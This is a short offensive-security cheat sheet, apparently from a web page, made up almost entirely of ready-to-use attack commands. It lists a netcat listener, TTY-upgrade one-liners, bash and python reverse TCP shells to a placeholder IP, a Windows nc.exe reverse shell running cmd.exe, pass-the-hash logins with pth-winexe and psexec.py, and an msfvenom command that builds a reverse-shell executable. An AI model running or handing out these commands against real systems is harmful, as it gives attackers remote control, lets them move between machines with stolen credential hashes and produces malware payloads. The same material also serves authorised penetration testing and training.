Shell
Linux
Windows
msfvenom
Linux listening to port
# Listen to port
$ nc -lvnp [port]
Linux TTY shells ⚙
# Bash
$ /bin/sh -i
# Perl
$ perl -e 'exec("/bin/sh");'
# Python
$ python3 -c 'import pty; pty.spawn("/bin/sh")'
Linux reverse TCP shell ⚙
# Bash
$ bash -i >& /dev/tcp/[ip]/[port] 0>&1
# Python
$ python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[ip]",[port]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Windows reverse shell
# nc.exe
$ nc.exe [ip] [port] -e cmd.exe
Pass The Hash (PTH) Attack
# PTH Attack
# winexe + PTH
$ pth-winexe -U [user]%[LM:NTLM] //[ip] cmd.exe
# psexec.py + PTH
$ psexec.py -hashes [LM]:[NTLM] [user]@[ip]
msfvenom example usage ⚙
# Examples
# Windows shell
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ip] LPORT=[port] EXITFUNC=thread -f exe > shell.exe